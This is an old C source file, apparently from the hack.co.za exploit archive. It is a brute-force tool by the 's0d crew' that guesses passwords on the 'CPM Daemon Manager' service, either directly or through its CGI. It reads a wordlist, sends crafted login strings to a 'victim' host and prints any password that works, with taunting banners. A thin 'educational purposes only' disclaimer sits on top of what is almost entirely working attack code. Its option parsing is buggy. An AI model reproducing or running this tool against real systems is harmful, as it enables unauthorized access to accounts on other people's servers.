/*
      exp_cpmdaemon.c
  -----------------------
  BY COMPILING THIS PROGRAM YOU HEREBY DECLINE ALL LEGAL AND CIVIL
  RESPONSABILITY TO  THE AUTHOR(S), IF YOU DO NOT COMPLY WITH THIS
  YOU   ARE   HEREBY   BINDED  TO  SECURELY   ERASE  THIS  SOURCE.

 THIS PROGRAM IS PROOF OF CONCEPT AND FOR EDUCATIONAL PURPOSES ONLY.
 -----------------------

 Description:

  Program to bruteforce passwords on this little daemon ...

  Compile with:

     gcc -Wall -o exp-cpmdaemon exp-cpmdaemon.c

  or if you want debug gcc:

     gcc -Wall -DDEBUG -o exp-cpmdaemon exp-cpmdaemon.c

 Authors:

  El Nahual
  "int main(void) { write(1, "Tha s0d owns me biatch!", 23); return 0; }"

  0x90
  "The louder the music the better the code!"

				www.s0d.org
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <fcntl.h>
#include <time.h>
#include <wait.h>
#include <errno.h>

#define GOTIT        "Changed"
#define KEEPTRYING   "Invalid"

/* Definicion de colores */
#define VERDE   "\E[32m"
#define BRILLOSO   "\E[1m"
#define NORMAL  "\E[m"
#define ROJO  "\E[31m"
#define CELESTE "\E[36m"
#define AZUL "\E[34m"
#define AMARILLO "\E[33m"
#define MORADO "\E[35m"

void usage(char *nombre) {
  printf("%sUsage: %s%s -[dc] -p <port> -l <login> -h <vicitm> \n", ROJO, AMARILLO,nombre);
  printf("%sd:Daemon mode \n", CELESTE);
  printf("l: login name to bruteforce\n");
  printf("h: host to attack \n");
  printf("c: cgi mode %s\n", NORMAL);
  printf("%s.o0{ Passwords should in a file called passwds.s0d }0o.%s\n", AMARILLO, NORMAL);
}

unsigned long resolver (char *serv) {
  struct sockaddr_in sinn;
  struct hostent *hent;

  hent = gethostbyname (serv);

  bzero ((char *) &sinn, sizeof (sinn));

  memcpy ((char *) &sinn.sin_addr, hent->h_addr, hent->h_length);

  return sinn.sin_addr.s_addr;
}


int connex(int victim, int port) {
  int sockfd;
  struct sockaddr_in hostaddr;

  if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
    perror("connex");
    exit(-1);
  }

  hostaddr.sin_port = htons(port);
  hostaddr.sin_addr.s_addr = victim;
  hostaddr.sin_family = AF_INET;

  if((connect(sockfd, (struct sockaddr *) &hostaddr, sizeof(hostaddr))) < 0 ) {
    perror("connex");
    exit(-1);
  }

  return sockfd;
}


/*
  The difference between the daemon and the cgi is the calling of the cgi everytime
*/

int daemon_attack(int victim, char *login, char *passwd, int port) {
  int sockfd, retval, i;
  fd_set rfds;
  struct timeval timer;
  char attack[1024], tmp[255];

  for(i = 0; i < 1024; i++)
    attack[i] = '\0';

  for(i = 0; i < 255; i++)
    tmp[i] = '\0';

  /* Ensambling attack */

  strcat(attack, login);
  strcat(attack, ":");
  strcat(attack, passwd);
  strcat(attack, "*");
  strcat(attack, passwd);
  strcat(attack, "#");
  strcat(attack, "\n");

#ifdef DEBUG
  printf("Trying login %s with password %s \n", login, passwd);
#endif

  sockfd = connex(victim, port);
  FD_ZERO(&rfds);
  FD_SET(sockfd, &rfds);
  timer.tv_sec = 5;
  timer.tv_usec = 0;
  
  retval = select(sockfd + 1, NULL, &rfds, NULL, &timer);

  if(retval) {
    read(sockfd, tmp, sizeof(tmp));
    if(strncmp(tmp, "CPM Daemon Manager", 18) == 0) {
      write(sockfd, attack, strlen(attack));
      read(sockfd, tmp, sizeof(tmp));
      if(strstr(tmp, "Changed") != NULL) {
	printf("\t%s----------------------------------------\n", VERDE);
	printf("\t%sUser %s%s%s has passwd %s%s%s %s\n", VERDE, CELESTE, login, VERDE, CELESTE, passwd, VERDE, NORMAL);
	printf("\t%sTha s0d crew owns you biatch!!!!!!%s\n", VERDE, NORMAL);
	printf("\t%s----------------------------------------%s\n", VERDE, NORMAL);
	return 0;
      }
      else {

#ifdef DEBUG	
	printf("%s\n", tmp);
#endif
	return 1;
      }
    }
    else {
      printf("Doh! this is not the CPM Daemon manager!\n");
      exit(0);
    }
  }
  else {
    printf("Timeout! \n");
    exit(0);
  }

  return 0;
}

int cgi_attack(int victim, char *login, char *passwd, int port) {
  char call_cgi[255] = "GET /cgi-bin/cpmdaemon.cgi HTTP/1.0 \r\n\r\n";
  int sockfd, retval, i;
  fd_set rfds;
  struct timeval timer;
  char attack[1024], tmp[255];

  for(i = 0; i < 1024; i++)
    attack[i] = '\0';

  for(i = 0; i < 255; i++)
    tmp[i] = '\0';

  /* Ensambling attack */

  strcat(attack, login);
  strcat(attack, ":");
  strcat(attack, passwd);
  strcat(attack, "*");
  strcat(attack, passwd);
  strcat(attack, "#");
  strcat(attack, "\n");

#ifdef DEBUG
  printf("attack's value is: %s \n", attack);
#endif

  /* calling the cgi */

  sockfd = connex(victim, 80);
  FD_ZERO(&rfds);
  FD_SET(sockfd, &rfds);
  timer.tv_sec = 5;
  timer.tv_usec = 0;

  retval = select(sockfd + 1, NULL, &rfds, NULL, &timer);

  if(retval) {
#ifdef DEBUG
    printf("calling the cgi with %s", call_cgi);
#endif
    write(sockfd, call_cgi, strlen(call_cgi));
  }
  else {
    printf("TIMEOUT!\n");
    exit(-1);
  }

  close(sockfd);

  /* doing the attack on the pseudodaemon */

#ifdef DEBUG
  printf("Connecting with login %s and passwd %s \n", login, passwd);
#endif

  sockfd = connex(victim, port);
  FD_ZERO(&rfds);
  FD_SET(sockfd, &rfds);
  timer.tv_sec = 5;
  timer.tv_usec = 0;
  
  retval = select(sockfd + 1, NULL, &rfds, NULL, &timer);

  if(retval) {
    read(sockfd, tmp, sizeof(tmp));
    if(strncmp(tmp, "CPM Daemon Manager", 18) == 0) {
      write(sockfd, attack, strlen(attack));
      read(sockfd, tmp, sizeof(tmp));
      if(strstr(tmp, "Changed") != NULL) {
	printf("%sUser %s has passwd %s %s\n", CELESTE, login, passwd, NORMAL);
	return 0;
      }
      else {
#ifdef DEBUG	
	printf("%s\n", tmp);
#endif
	return 1;
      }
    }
    else {
      printf("Doh! this is not the CPM Daemon manager!\n");
      exit(0);
    }
  }
  else {
    printf("Timeout! \n");
    exit(0);
  }

  return 0;
}

void header(void) {
  printf("%s\t\t\texp_cpmdaemon\n", ROJO);
  printf("\t----------------------------------------------\n");
  printf("%s\t     by El Nahual and 0x90 of tha s0d crew\n", AMARILLO);
  printf("\t\ts0d crew owns you biatch!\n");
  printf("%s\t----------------------------------------------%s\n\n", ROJO, NORMAL);
}

int main(int argc, char **argv) {
  char ch;
  int counter = 1, port, i;
  char *login, *server, tmp[255];
  char daemon = 0;   //Daemon enabled by default
  FILE *inFile;

  if(argc != 8) {
    usage(argv[0]);
    exit(0);
  }


  for(i = 0; i < 255; i++)
    tmp[255] = '\0';

  while((ch = getopt(argc, argv, "h:,l:,dc,p:")) != EOF) {
    counter++;
    switch(ch) {
    case 'h':
      server = argv[counter + 1];
      break;
    case 'l':
      login = argv[counter];
      break;
    case 'd':
      daemon = 0;
      break;
    case 'c':
      daemon = 1;
      break;
    case 'p':
      port = atoi(argv[counter + 2]);
      break;
    default:
      usage(argv[0]);
      exit(0);
      break;
    }
  }

  header();

  if((inFile = fopen("passwds.s0d", "r")) == NULL) {
    perror("exp_cpmdaemon.c");
    exit(-1);
  }

  (void)fseek(inFile, 0, SEEK_SET);

  while(fgets(tmp, 255, inFile) != NULL) {

    if(tmp[strlen(tmp) - 1] == '\n')
      tmp[strlen(tmp) - 1] = '\0';

    if(daemon == 0) {
      daemon_attack(resolver(server), login, tmp, port);
    }
    else {
      cgi_attack(resolver(server), login, tmp, port);
    }

  }
  return 0;
}
/*                   www.hack.co.za   [5 September 2000]*/